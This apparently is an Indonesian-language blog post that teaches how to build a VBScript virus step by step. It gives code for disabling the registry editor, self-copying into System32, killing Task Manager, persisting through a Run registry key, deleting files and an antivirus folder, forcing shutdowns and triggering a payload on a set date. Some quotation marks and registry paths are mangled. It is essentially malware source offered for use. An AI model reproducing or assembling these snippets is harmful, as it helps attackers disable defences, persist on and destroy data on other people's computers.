1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
CreateObject(”WScript.Shell”).run “cmd.exe /c reg add
hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1″” /f”, vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(”WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\
windows\currentversion\policies\systemdisableregistrytools”, 1,
“REG_DWORD”
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(”scripting.filesystemobject”).copyfile
wscript.scriptfullname,
createobject(”scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite
“HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di
singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di
direktory C:\)
6.Merestart Windows
CreateObject(”WScript.Shell”).run “shutdown -r -f -t 60″, vbhide
merestart windows dalam waktu 60 sekon
7.Meng-ShutDown Windows
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60″, vbhide
mematikan windows dalam waktu 60 sekon :) yang beda cuman
“shutdown -s-f -t 60″
S = untuk shutdown dan
R = untuk reboot\restart
8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2007
Tidak ada komentar:
Posting Komentar